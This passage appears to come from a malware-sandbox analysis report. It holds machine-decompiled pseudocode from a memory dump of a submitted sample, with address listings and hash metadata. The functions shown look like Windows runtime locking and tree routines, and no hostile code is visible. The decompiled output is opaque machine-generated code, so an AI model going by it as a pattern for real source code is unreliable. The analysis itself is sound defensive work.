                            								_t228 = _v75;
                            								_v56 = _t240;
                            								__eflags = _t133;
                            								if(_t133 != 0) {
                            									__eflags = _t228;
                            									if(_t228 == 0) {
                            										L43:
                            										__eflags = _v72;
                            										if(_v72 == 0) {
                            											goto L8;
                            										}
                            										goto L69;
                            									}
                            									_t133 = E017158EC(_t240);
                            									_t221 =  *0x1805cac; // 0x16
                            									__eflags = _t221 & 0x00000040;
                            									if((_t221 & 0x00000040) != 0) {
                            										_t228 = 0;
                            										__eflags = _t252;
                            										if(_t252 != 0) {
                            											goto L43;
                            										}
                            										_t133 = _v72;
                            										goto L7;
                            									}
                            									goto L43;
                            								} else {
                            									_t133 = _v72;
                            									goto L6;
                            								}
                            							}
                            							L25:
                            							_t133 = _v73;
                            							goto L26;
                            						} else {
                            							L6:
                            							_t221 =  *0x1805cac; // 0x16
                            							L7:
                            							if(_t133 != 0) {
                            								__eflags = _t133 & 0x00001000;
                            								if((_t133 & 0x00001000) != 0) {
                            									_t133 = _t133 | 0x00000a00;
                            									__eflags = _t221 & 0x00000004;
                            									if((_t221 & 0x00000004) != 0) {
                            										_t133 = _t133 | 0x00000400;
                            									}
                            								}
                            								__eflags = _t228;
                            								if(_t228 != 0) {
                            									_t133 = _t133 | 0x00000100;
                            								}
                            								_t229 = E01754A2C(0x1806e40, 0x1754b30, _t133, _t240);
                            								__eflags = _t229;
                            								if(_t229 == 0) {
                            									_t202 = _a20;
                            									goto L100;
                            								} else {
                            									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                            									L15:
                            									_t202 = _a20;
                            									 *_t202 = _t135;
                            									if(_t229 == 0) {
                            										L100:
                            										 *_a4 = 0;
                            										_t137 = _a8;
                            										__eflags = _t137;
                            										if(_t137 != 0) {
                            											 *_t137 = 0;
                            										}
                            										 *_t202 = 0;
                            										_t129 = 0xc0000017;
                            										goto L23;
                            									} else {
                            										_t242 = _a16;
                            										if(_t242 != 0) {
                            											_t254 = _t229;
                            											memcpy(_t242, _t254, 0xd << 2);
                            											_t267 = _t267 + 0xc;
                            											_t242 = _t254 + 0x1a;
                            										}
                            										_t205 = _a4;
                            										_t25 = _t229 + 0x48; // 0x48
                            										 *_t205 = _t25;
                            										_t140 = _a8;
                            										if(_t140 != 0) {
                            											__eflags =  *((char*)(_t267 + 0xa));
                            											if( *((char*)(_t267 + 0xa)) != 0) {
                            												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                            											} else {
                            												 *_t140 = 0;
                            											}
                            										}
                            										_t256 = _a12;
                            										if(_t256 != 0) {
                            											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                            										}
                            										_t257 =  *_t205;
                            										_v48 = 0;
                            										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                            										_v56 = 0;
                            										_v52 = 0;
                            										_t144 =  *( *[fs:0x30] + 0x50);
                            										if(_t144 != 0) {
                            											__eflags =  *_t144;
                            											if( *_t144 == 0) {
                            												goto L20;
                            											}
                            											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            											goto L21;
                            										} else {
                            											L20:
                            											_t145 = 0x7ffe0384;
                            											L21:
                            											if( *_t145 != 0) {
                            												_t146 =  *[fs:0x30];
                            												__eflags =  *(_t146 + 0x240) & 0x00000004;
                            												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                            													_t147 = E01737D50();
                            													__eflags = _t147;
                            													if(_t147 == 0) {
                            														_t148 = 0x7ffe0385;
                            													} else {
                            														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                            													}
                            													__eflags =  *_t148 & 0x00000020;
                            													if(( *_t148 & 0x00000020) != 0) {
                            														_t149 = _v72;
                            														__eflags = _t149;
                            														if(__eflags == 0) {
                            															_t149 = 0x16f5c80;
                            														}
                            														_push(_t149);
                            														_push( &_v48);
                            														 *((char*)(_t267 + 0xb)) = L0174F6E0(_t198, _t242, _t257, __eflags);
                            														_push(_t257);
                            														_push( &_v64);
                            														_t153 = L0174F6E0(_t198, _t242, _t257, __eflags);
                            														__eflags =  *((char*)(_t267 + 0xb));
                            														if( *((char*)(_t267 + 0xb)) != 0) {
                            															__eflags = _t153;
                            															if(_t153 != 0) {
                            																__eflags = 0;
                            																E01797016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                            																L01732400(_t267 + 0x20);
                            															}
                            															L01732400( &_v64);
                            														}
                            													}
                            												}
                            											}
                            											_t129 = 0;
                            											L23:
                            											return _t129;
                            										}
                            									}
                            								}
                            							}
                            							L8:
                            							_t275 = _t240;
                            							if(_t275 != 0) {
                            								_v73 = 0;
                            								_t253 = 0;
                            								__eflags = 0;
                            								L29:
                            								_push(0);
                            								_t241 = E01742397(_t240);
                            								__eflags = _t241;
                            								if(_t241 == 0) {
                            									_t229 = 0;
                            									L14:
                            									_t135 = 0;
                            									goto L15;
                            								}
                            								__eflags =  *((char*)(_t267 + 0xb));
                            								 *(_t241 + 0x34) = 1;
                            								if( *((char*)(_t267 + 0xb)) != 0) {
                            									E01732280(_t134, 0x1808608);
                            									__eflags =  *0x1806e48 - _t253; // 0x0
                            									if(__eflags != 0) {
                            										L48:
                            										_t253 = 0;
                            										__eflags = 0;
                            										L49:
                            										L0172FFB0(_t198, _t241, 0x1808608);
                            										__eflags = _t253;
                            										if(_t253 != 0) {
                            											L017377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                            										}
                            										goto L31;
                            									}
                            									 *0x1806e48 = _t241;
                            									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                            									__eflags = _t253;
                            									if(_t253 != 0) {
                            										_t57 = _t253 + 0x34;
                            										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                            										__eflags =  *_t57;
                            										if( *_t57 == 0) {
                            											goto L49;
                            										}
                            									}
                            									goto L48;
                            								}
                            								L31:
                            								_t229 = _t241;
                            								goto L14;
                            							}
                            							_v73 = 1;
                            							_v64 = _t240;
                            							asm("lock bts dword [esi], 0x0");
                            							if(_t275 < 0) {
                            								_t231 =  *0x1808608; // 0x0
                            								while(1) {
                            									_v60 = _t231;
                            									__eflags = _t231 & 0x00000001;
                            									if((_t231 & 0x00000001) != 0) {
                            										goto L76;
                            									}
                            									_t73 = _t231 + 1; // 0x1
                            									_t210 = _t73;
                            									asm("lock cmpxchg [edi], ecx");
                            									__eflags = _t231 - _t231;
                            									if(_t231 != _t231) {
                            										L92:
                            										_t133 = E01746B90(_t210,  &_v64);
                            										_t262 =  *0x1808608; // 0x0
                            										L93:
                            										_t231 = _t262;
                            										continue;
                            									}
                            									_t240 = _v56;
                            									goto L10;
                            									L76:
                            									_t169 = E0174E180(_t133);
                            									__eflags = _t169;
                            									if(_t169 != 0) {
                            										_push(0xc000004b);
                            										_push(0xffffffff);
                            										L017597C0();
                            										_t231 = _v68;
                            									}
                            									_v72 = 0;
                            									_v24 =  *( *[fs:0x18] + 0x24);
                            									_v16 = 3;
                            									_v28 = 0;
                            									__eflags = _t231 & 0x00000002;
                            									if((_t231 & 0x00000002) == 0) {
                            										_v32 =  &_v36;
                            										_t174 = _t231 >> 4;
                            										__eflags = 1 - _t174;
                            										_v20 = _t174;
                            										asm("sbb ecx, ecx");
                            										_t210 = 3 |  &_v36;
                            										__eflags = _t174;
                            										if(_t174 == 0) {
                            											_v20 = 0xfffffffe;
                            										}
                            									} else {
                            										_v32 = 0;
                            										_v20 = 0xffffffff;
                            										_v36 = _t231 & 0xfffffff0;
                            										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                            										_v72 =  !(_t231 >> 2) & 0xffffff01;
                            									}
                            									asm("lock cmpxchg [edi], esi");
                            									_t262 = _t231;
                            									__eflags = _t262 - _t231;
                            									if(_t262 != _t231) {
                            										goto L92;
                            									} else {
                            										__eflags = _v72;
                            										if(_v72 != 0) {
                            											E0175006A(0x1808608, _t210);
                            										}
                            										__eflags =  *0x7ffe036a - 1;
                            										if(__eflags <= 0) {
                            											L89:
                            											_t133 =  &_v16;
                            											asm("lock btr dword [eax], 0x1");
                            											if(__eflags >= 0) {
                            												goto L93;
                            											} else {
                            												goto L90;
                            											}
                            											do {
                            												L90:
                            												_push(0);
                            												_push(0x1808608);
                            												E0175B180();
                            												_t133 = _v24;
                            												__eflags = _t133 & 0x00000004;
                            											} while ((_t133 & 0x00000004) == 0);
                            											goto L93;
                            										} else {
                            											_t218 =  *0x1806904; // 0x400
                            											__eflags = _t218;
                            											if(__eflags == 0) {
                            												goto L89;
                            											} else {
                            												goto L87;
                            											}
                            											while(1) {
                            												L87:
                            												__eflags = _v16 & 0x00000002;
                            												if(__eflags == 0) {
                            													goto L89;
                            												}
                            												asm("pause");
                            												_t218 = _t218 - 1;
                            												__eflags = _t218;
                            												if(__eflags != 0) {
                            													continue;
                            												}
                            												goto L89;
                            											}
                            											goto L89;
                            										}
                            									}
                            								}
                            							}
                            							L10:
                            							_t229 =  *0x1806e48; // 0x0
                            							_v72 = _t229;
                            							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                            								L0172FFB0(_t198, _t240, 0x1808608);
                            								_t253 = _v76;
                            								goto L29;
                            							} else {
                            								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                            								asm("lock cmpxchg [esi], ecx");
                            								_t215 = 1;
                            								if(1 != 1) {
                            									while(1) {
                            										_t246 = _t215 & 0x00000006;
                            										_t180 = _t215;
                            										__eflags = _t246 - 2;
                            										_v56 = _t246;
                            										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                            										asm("lock cmpxchg [edi], esi");
                            										_t248 = _v56;
                            										__eflags = _t180 - _t215;
                            										if(_t180 == _t215) {
                            											break;
                            										}
                            										_t215 = _t180;
                            									}
                            									__eflags = _t248 - 2;
                            									if(_t248 == 2) {
                            										__eflags = 0;
                            										E017500C2(0x1808608, 0, _t235);
                            									}
                            									_t229 = _v72;
                            								}
                            								goto L14;
                            							}
                            						}
                            					}
                            				}
                            				_t227 = 0;
                            				_v75 = 0;
                            				if(_t128 != 0) {
                            					goto L4;
                            				}
                            				goto L2;
                            			}
                            0x0178597f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01785981
                            0x01785981
                            0x01785981
                            0x01785983
                            0x01785988
                            0x0178598d
                            0x01785991
                            0x01785991
                            0x00000000
                            0x0178595d
                            0x0178595d
                            0x01785963
                            0x01785965
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01785967
                            0x01785967
                            0x0178596b
                            0x0178596d
                            0x00000000
                            0x00000000
                            0x0178596f
                            0x01785971
                            0x01785971
                            0x01785974
                            0x00000000
                            0x00000000
                            0x00000000
                            0x01785974
                            0x00000000
                            0x01785967
                            0x0178595b
                            0x01785942
                            0x01785863
                            0x01742143
                            0x01742143
                            0x01742149
                            0x0174214f
                            0x017422f1
                            0x017422f6
                            0x00000000
                            0x01742173
                            0x01742173
                            0x0174217d
                            0x01742181
                            0x01742186
                            0x017859ae
                            0x017859b2
                            0x017859b5
                            0x017859b7
                            0x017859ba
                            0x017859cd
                            0x017859d1
                            0x017859d5
                            0x017859d9
                            0x017859db
                            0x00000000
                            0x00000000
                            0x017859dd
                            0x017859dd
                            0x017859e1
                            0x017859e4
                            0x017859e7
                            0x017859ee
                            0x017859ee
                            0x017859f3
                            0x017859f3
                            0x00000000
                            0x01742186
                            0x0174214f
                            0x01742106
                            0x01742266
                            0x017420d8
                            0x017420da
                            0x017420e0
                            0x00000000
                            0x00000000
                            0x00000000

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 4d90f777f750758c8627282f1fd422c17cbd2be664b58a79ff5852d194d2b673
                            • Instruction ID: 533b723e2d69ecaf28f2086b6728444caa0bfa70e79b109feda6056a90036c00
                            • Opcode Fuzzy Hash: 4d90f777f750758c8627282f1fd422c17cbd2be664b58a79ff5852d194d2b673
                            • Instruction Fuzzy Hash: 62F11331A083419FE726DF2CD84476BFBE1AF85324F05856DF9959B282D734D851CB82
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E0172B090(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                            				signed int _v8;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _t117;
                            				signed int _t119;
                            				signed int _t120;
                            				signed int _t121;
                            				signed int _t122;
                            				signed int _t123;
                            				signed int _t126;
                            				signed int _t134;
                            				signed int _t139;
                            				signed char _t143;
                            				signed int _t144;
                            				signed int _t146;
                            				signed int _t148;
                            				signed int* _t150;
                            				signed int _t152;
                            				signed int _t161;
                            				signed char _t165;
                            				signed int _t167;
                            				signed int _t170;
                            				signed int _t174;
                            				signed char _t177;
                            				signed int _t178;
                            				signed int _t181;
                            				signed int _t182;
                            				signed int _t187;
                            				signed int _t190;
                            				signed int _t192;
                            				signed int _t194;
                            				signed int _t196;
                            				signed int _t199;
                            				signed int _t202;
                            				signed int _t208;
                            				signed int _t211;
                            
                            				_t182 = _a16;
                            				_t178 = _a8;
                            				_t161 = _a4;
                            				 *_t182 = 0;
                            				 *(_t182 + 4) = 0;
                            				_t5 = _t161 + 4; // 0x4
                            				_t117 =  *_t5 & 0x00000001;
                            				if(_t178 == 0) {
                            					 *_t161 = _t182;
                            					 *(_t161 + 4) = _t182;
                            					if(_t117 != 0) {
                            						_t117 = _t182 | 0x00000001;
                            						 *(_t161 + 4) = _t117;
                            					}
                            					 *(_t182 + 8) = 0;
                            					goto L43;
                            				} else {
                            					_t208 = _t182 ^ _t178;
                            					_t192 = _t208;
                            					if(_t117 == 0) {
                            						_t192 = _t182;
                            					}
                            					_t117 = _a12 & 0x000000ff;
                            					 *(_t178 + _t117 * 4) = _t192;
                            					if(( *(_t161 + 4) & 0x00000001) == 0) {
                            						_t208 = _t178;
                            					}
                            					 *(_t182 + 8) = _t208 | 0x00000001;
                            					if(_a12 == 0) {
                            						_t14 = _t161 + 4; // 0x4
                            						_t177 =  *_t14;
                            						_t117 = _t177 & 0xfffffffe;
                            						if(_t178 == _t117) {
                            							_t117 = _a4;
                            							 *(_t117 + 4) = _t182;
                            							if((_t177 & 0x00000001) != 0) {
                            								_t161 = _a4;
                            								_t117 = _t182 | 0x00000001;
                            								 *(_t161 + 4) = _t117;
                            							} else {
                            								_t161 = _t117;
                            							}
                            						} else {
                            							_t161 = _a4;
                            						}
                            					}
                            					if(( *(_t178 + 8) & 0x00000001) == 0) {
                            						L42:
                            						L43:
                            						return _t117;
                            					} else {
                            						_t19 = _t161 + 4; // 0x4
                            						_t165 =  *_t19 & 0x00000001;
                            						do {
                            							_t211 =  *(_t178 + 8) & 0xfffffffc;
                            							if(_t165 != 0) {
                            								if(_t211 != 0) {
                            									_t211 = _t211 ^ _t178;
                            								}
                            							}
                            							_t119 =  *_t211;
                            							if(_t165 != 0) {
                            								if(_t119 != 0) {
                            									_t119 = _t119 ^ _t211;
                            								}
                            							}
                            							_t120 = 0;
                            							_t121 = _t120 & 0xffffff00 | _t119 != _t178;
                            							_v8 = _t121;
                            							_t122 = _t121 ^ 0x00000001;
                            							_v16 = _t122;
                            							_t123 =  *(_t211 + _t122 * 4);
                            							if(_t165 != 0) {
                            								if(_t123 == 0) {
                            									goto L20;
                            								}
                            								_t123 = _t123 ^ _t211;
                            								goto L13;
                            							} else {
                            								L13:
                            								if(_t123 == 0 || ( *(_t123 + 8) & 0x00000001) == 0) {
                            									L20:
                            									_t194 = _v16;
                            									if((_a12 & 0x000000ff) != _v8) {
                            										_t126 =  *(_t182 + 8) & 0xfffffffc;
                            										_t167 = _t165 & 1;
                            										_v12 = _t167;
                            										if(_t167 != 0) {
                            											if(_t126 != 0) {
                            												_t126 = _t126 ^ _t182;
                            											}
                            										}
                            										if(_t126 != _t178) {
                            											L83:
                            											_t178 = 0x1d;
                            											asm("int 0x29");
                            											goto L84;
                            										} else {
                            											_t126 =  *(_t178 + _t194 * 4);
                            											if(_t167 != 0) {
                            												if(_t126 != 0) {
                            													_t126 = _t126 ^ _t178;
                            												}
                            											}
                            											if(_t126 != _t182) {
                            												goto L83;
                            											} else {
                            												_t126 =  *(_t211 + _v8 * 4);
                            												if(_t167 != 0) {
                            													if(_t126 != 0) {
                            														_t126 = _t126 ^ _t211;
                            													}
                            												}
                            												if(_t126 != _t178) {
                            													goto L83;
                            												} else {
                            													_t77 = _t178 + 8; // 0x8
                            													_t150 = _t77;
                            													_v20 = _t150;
                            													_t126 =  *_t150 & 0xfffffffc;
                            													if(_t167 != 0) {
                            														if(_t126 != 0) {
                            															_t126 = _t126 ^ _t178;
                            														}
                            													}
                            													if(_t126 != _t211) {
                            														goto L83;
                            													} else {
                            														_t202 = _t211 ^ _t182;
                            														_t152 = _t202;
                            														if(_t167 == 0) {
                            															_t152 = _t182;
                            														}
                            														 *(_t211 + _v8 * 4) = _t152;
                            														_t170 = _v12;
                            														if(_t170 == 0) {
                            															_t202 = _t211;
                            														}
                            														 *(_t182 + 8) =  *(_t182 + 8) & 0x00000003 | _t202;
                            														_t126 =  *(_t182 + _v8 * 4);
                            														if(_t170 != 0) {
                            															if(_t126 == 0) {
                            																L58:
                            																if(_t170 != 0) {
                            																	if(_t126 != 0) {
                            																		_t126 = _t126 ^ _t178;
                            																	}
                            																}
                            																 *(_t178 + _v16 * 4) = _t126;
                            																_t199 = _t178 ^ _t182;
                            																if(_t170 != 0) {
                            																	_t178 = _t199;
                            																}
                            																 *(_t182 + _v8 * 4) = _t178;
                            																if(_t170 == 0) {
                            																	_t199 = _t182;
                            																}
                            																 *_v20 =  *_v20 & 0x00000003 | _t199;
                            																_t178 = _t182;
                            																_t167 =  *((intOrPtr*)(_a4 + 4));
                            																goto L21;
                            															}
                            															_t126 = _t126 ^ _t182;
                            														}
                            														if(_t126 != 0) {
                            															_t167 =  *(_t126 + 8);
                            															_t194 = _t167 & 0xfffffffc;
                            															if(_v12 != 0) {
                            																L84:
                            																if(_t194 != 0) {
                            																	_t194 = _t194 ^ _t126;
                            																}
                            															}
                            															if(_t194 != _t182) {
                            																goto L83;
                            															}
                            															if(_v12 != 0) {
                            																_t196 = _t126 ^ _t178;
                            															} else {
                            																_t196 = _t178;
                            															}
                            															 *(_t126 + 8) = _t167 & 0x00000003 | _t196;
                            															_t170 = _v12;
                            														}
                            														goto L58;
                            													}
                            												}
                            											}
                            										}
                            									}
                            									L21:
                            									_t182 = _v8 ^ 0x00000001;
                            									_t126 =  *(_t178 + 8) & 0xfffffffc;
                            									_v8 = _t182;
                            									_t194 = _t167 & 1;
                            									if(_t194 != 0) {
                            										if(_t126 != 0) {
                            											_t126 = _t126 ^ _t178;
                            										}
                            									}
                            									if(_t126 != _t211) {
                            										goto L83;
                            									} else {
                            										_t134 = _t182 ^ 0x00000001;
                            										_v16 = _t134;
                            										_t126 =  *(_t211 + _t134 * 4);
                            										if(_t194 != 0) {
                            											if(_t126 != 0) {
                            												_t126 = _t126 ^ _t211;
                            											}
                            										}
                            										if(_t126 != _t178) {
                            											goto L83;
                            										} else {
                            											_t167 = _t211 + 8;
                            											_t182 =  *_t167 & 0xfffffffc;
                            											_v20 = _t167;
                            											if(_t194 != 0) {
                            												if(_t182 == 0) {
                            													L80:
                            													_t126 = _a4;
                            													if( *_t126 != _t211) {
                            														goto L83;
                            													}
                            													 *_t126 = _t178;
                            													L34:
                            													if(_t194 != 0) {
                            														if(_t182 != 0) {
                            															_t182 = _t182 ^ _t178;
                            														}
                            													}
                            													 *(_t178 + 8) =  *(_t178 + 8) & 0x00000003 | _t182;
                            													_t139 =  *((intOrPtr*)(_t178 + _v8 * 4));
                            													if(_t194 != 0) {
                            														if(_t139 == 0) {
                            															goto L37;
                            														}
                            														_t126 = _t139 ^ _t178;
                            														goto L36;
                            													} else {
                            														L36:
                            														if(_t126 != 0) {
                            															_t167 =  *(_t126 + 8);
                            															_t182 = _t167 & 0xfffffffc;
                            															if(_t194 != 0) {
                            																if(_t182 != 0) {
                            																	_t182 = _t182 ^ _t126;
                            																}
                            															}
                            															if(_t182 != _t178) {
                            																goto L83;
                            															} else {
                            																if(_t194 != 0) {
                            																	_t190 = _t126 ^ _t211;
                            																} else {
                            																	_t190 = _t211;
                            																}
                            																 *(_t126 + 8) = _t167 & 0x00000003 | _t190;
                            																_t167 = _v20;
                            																goto L37;
                            															}
                            														}
                            														L37:
                            														if(_t194 != 0) {
                            															if(_t139 != 0) {
                            																_t139 = _t139 ^ _t211;
                            															}
                            														}
                            														 *(_t211 + _v16 * 4) = _t139;
                            														_t187 = _t211 ^ _t178;
                            														if(_t194 != 0) {
                            															_t211 = _t187;
                            														}
                            														 *(_t178 + _v8 * 4) = _t211;
                            														if(_t194 == 0) {
                            															_t187 = _t178;
                            														}
                            														_t143 =  *_t167 & 0x00000003 | _t187;
                            														 *_t167 = _t143;
                            														_t117 = _t143 | 0x00000001;
                            														 *_t167 = _t117;
                            														 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                            														goto L42;
                            													}
                            												}
                            												_t182 = _t182 ^ _t211;
                            											}
                            											if(_t182 == 0) {
                            												goto L80;
                            											}
                            											_t144 =  *(_t182 + 4);
                            											if(_t194 != 0) {
                            												if(_t144 != 0) {
                            													_t144 = _t144 ^ _t182;
                            												}
                            											}
                            											if(_t144 == _t211) {
                            												if(_t194 != 0) {
                            													_t146 = _t182 ^ _t178;
                            												} else {
                            													_t146 = _t178;
                            												}
                            												 *(_t182 + 4) = _t146;
                            												goto L34;
                            											} else {
                            												_t126 =  *_t182;
                            												if(_t194 != 0) {
                            													if(_t126 != 0) {
                            														_t126 = _t126 ^ _t182;
                            													}
                            												}
                            												if(_t126 != _t211) {
                            													goto L83;
                            												} else {
                            													if(_t194 != 0) {
                            														_t148 = _t182 ^ _t178;
                            													} else {
                            														_t148 = _t178;
                            													}
                            													 *_t182 = _t148;
                            													goto L34;
                            												}
                            											}
                            										}
                            									}
                            								} else {
                            									 *(_t178 + 8) =  *(_t178 + 8) & 0x000000fe;
                            									_t182 = _t211;
                            									 *(_t123 + 8) =  *(_t123 + 8) & 0x000000fe;
                            									_t174 = _a4;
                            									_t117 =  *(_t211 + 8);
                            									_t181 = _t117 & 0xfffffffc;
                            									if(( *(_t174 + 4) & 0x00000001) != 0) {
                            										if(_t181 == 0) {
                            											goto L42;
                            										}
                            										_t178 = _t181 ^ _t211;
                            									}
                            									if(_t178 == 0) {
                            										goto L42;
                            									}
                            									goto L17;
                            								}
                            							}
                            							L17:
                            							 *(_t211 + 8) = _t117 | 0x00000001;
                            							_t40 = _t174 + 4; // 0x4
                            							_t117 =  *_t178;
                            							_t165 =  *_t40 & 0x00000001;
                            							if(_t165 != 0) {
                            								if(_t117 != 0) {
                            									_t117 = _t117 ^ _t178;
                            								}
                            							}
                            							_a12 = _t211 != _t117;
                            						} while (( *(_t178 + 8) & 0x00000001) != 0);
                            						goto L42;
                            					}
                            				}
                            			}

                            0x0177a72a
                            0x0172b352
                            0x0172b357
                            0x0172b359
                            0x0172b359
                            0x0172b365
                            0x0172b367
                            0x0172b36c
                            0x00000000
                            0x0172b36c
                            0x0177a714
                            0x0177a714
                            0x0172b32f
                            0x0172b3b8
                            0x0172b3bd
                            0x0172b3c4
                            0x0172b425
                            0x0172b427
                            0x0172b429
                            0x0172b429
                            0x0172b427
                            0x0172b3c8
                            0x00000000
                            0x00000000
                            0x0172b3ce
                            0x0172b42f
                            0x0172b3d0
                            0x0172b3d0
                            0x0172b3d0
                            0x0172b3d7
                            0x0172b3da
                            0x0172b3da
                            0x00000000
                            0x0172b32f
                            0x0172b2f3
                            0x0172b2d8
                            0x0172b2c2
                            0x0172b2af
                            0x0172b1a3
                            0x0172b1a9
                            0x0172b1af
                            0x0172b1b2
                            0x0172b1b5
                            0x0172b1b8
                            0x0177a733
                            0x0177a739
                            0x0177a739
                            0x0177a733
                            0x0172b1c0
                            0x00000000
                            0x0172b1c6
                            0x0172b1c8
                            0x0172b1cb
                            0x0172b1ce
                            0x0172b1d3
                            0x0177a742
                            0x0177a748
                            0x0177a748
                            0x0177a742
                            0x0172b1db
                            0x00000000
                            0x0172b1e1
                            0x0172b1e1
                            0x0172b1e6
                            0x0172b1e9
                            0x0172b1ee
                            0x0177a751
                            0x0172b409
                            0x0172b409
                            0x0172b40e
                            0x00000000
                            0x00000000
                            0x0172b410
                            0x0172b22d
                            0x0172b22f
                            0x0177a790
                            0x0177a796
                            0x0177a796
                            0x0177a790
                            0x0172b23d
                            0x0172b243
                            0x0172b248
                            0x0177a79f
                            0x00000000
                            0x00000000
                            0x0177a7a5
                            0x00000000
                            0x0172b24e
                            0x0172b24e
                            0x0172b250
                            0x0172b374
                            0x0172b379
                            0x0172b37e
                            0x0177a7ae
                            0x0177a7b4
                            0x0177a7b4
                            0x0177a7ae
                            0x0172b386
                            0x00000000
                            0x0172b38c
                            0x0172b38e
                            0x0177a7bd
                            0x0172b394
                            0x0172b394
                            0x0172b394
                            0x0172b39b
                            0x0172b39e
                            0x00000000
                            0x0172b39e
                            0x0172b386
                            0x0172b256
                            0x0172b258
                            0x0177a7c6
                            0x0177a7cc
                            0x0177a7cc
                            0x0177a7c6
                            0x0172b261
                            0x0172b266
                            0x0172b26a
                            0x0177a7d3
                            0x0177a7d3
                            0x0172b273
                            0x0172b278
                            0x0172b27a
                            0x0172b27a
                            0x0172b281
                            0x0172b283
                            0x0172b285
                            0x0172b287
                            0x0172b289
                            0x00000000
                            0x0172b289
                            0x0172b248
                            0x0177a757
                            0x0177a757
                            0x0172b1f6
                            0x00000000
                            0x00000000
                            0x0172b1fc
                            0x0172b201
                            0x0177a760
                            0x0177a766
                            0x0177a766
                            0x0177a760
                            0x0172b209
                            0x0172b3a8
                            0x0177a76f
                            0x0172b3ae
                            0x0172b3ae
                            0x0172b3ae
                            0x0172b3b0
                            0x00000000
                            0x0172b20f
                            0x0172b20f
                            0x0172b213
                            0x0177a778
                            0x0177a77e
                            0x0177a77e
                            0x0177a778
                            0x0172b21b
                            0x00000000
                            0x0172b221
                            0x0172b223
                            0x0177a787
                            0x0172b229
                            0x0172b229
                            0x0172b229
                            0x0172b22b
                            0x00000000
                            0x0172b22b
                            0x0172b21b
                            0x0172b209
                            0x0172b1db
                            0x0172b142
                            0x0172b142
                            0x0172b146
                            0x0172b148
                            0x0172b14c
                            0x0172b14f
                            0x0172b154
                            0x0172b15b
                            0x0177a6b4
                            0x00000000
                            0x00000000
                            0x0177a6ba
                            0x0177a6ba
                            0x0172b163
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0172b163
                            0x0172b13a
                            0x0172b169
                            0x0172b16b
                            0x0172b16e
                            0x0172b171
                            0x0172b175
                            0x0172b178
                            0x0177a6c3
                            0x0177a6c9
                            0x0177a6c9
                            0x0177a6c3
                            0x0172b180
                            0x0172b184
                            0x00000000
                            0x0172b104
                            0x0172b0f6

                            Memory Dump Source
                            • Source File: 00000000.00000002.289263472.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_16f0000_7pECKdsaig.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                            • Instruction ID: fabe4d4ab7b509f54ade40e2d2ec5d35594fdd645bbbcc043c86a55ed514fb5c
                            • Opcode Fuzzy Hash: 0ec6c5e2d367d18b84ee964be1aa1d3b822183ad02e3793e91df51d62079f2cb
                            • Instruction Fuzzy Hash: 5AD1C1317147268BEF26CE6DC5C066AFBE1AF85354F2C85A8DC65CB246E731D8438790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 99%
                            			E01710D20(signed short* _a4, signed char _a8, unsigned int _a12) {
                            				signed char _v5;
                            				signed int _v12;
                            				signed int _v16;
                            				signed int _v20;
                            				signed int _v24;
                            				signed int _v28;
                            				signed int _v32;
                            				unsigned int _v36;
                            				signed char _v40;
                            				intOrPtr _v44;
                            				intOrPtr _v48;
                            				intOrPtr _v52;
                            				intOrPtr _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				intOrPtr _v72;
                            				intOrPtr _v76;
                            				signed int _v80;
                            				signed int _v84;
                            				intOrPtr _v88;
                            				intOrPtr _v92;
                            				signed int _v96;
                            				unsigned int _v100;
                            				signed int _t159;
                            				unsigned int _t160;
                            				signed int _t162;
                            				unsigned int _t163;
                            				signed int _t180;
                            				signed int _t192;
                            				signed int _t193;
                            				unsigned int _t194;
                            				signed char _t196;
                            				signed int _t197;
                            				signed char _t198;
                            				signed char _t199;
                            				unsigned int _t200;
                            				unsigned int _t202;
                            				unsigned int _t204;
                            				unsigned int _t205;
                            				unsigned int _t209;
                            				signed int _t210;
                            				signed int _t211;
                            				unsigned int _t212;
                            				signed char _t213;
                            				signed short* _t214;
                            				intOrPtr _t215;
                            				signed int _t216;
                            				signed int _t217;
                            				unsigned int _t218;
                            				signed int _t220;
                            				signed int _t221;
                            				signed short _t223;
                            				signed char _t224;
                            				signed int _t229;
                            				signed int _t231;
                            				unsigned int _t233;
                            				unsigned int _t237;
                            				signed int _t238;
                            				unsigned int _t239;
                            				signed int _t240;
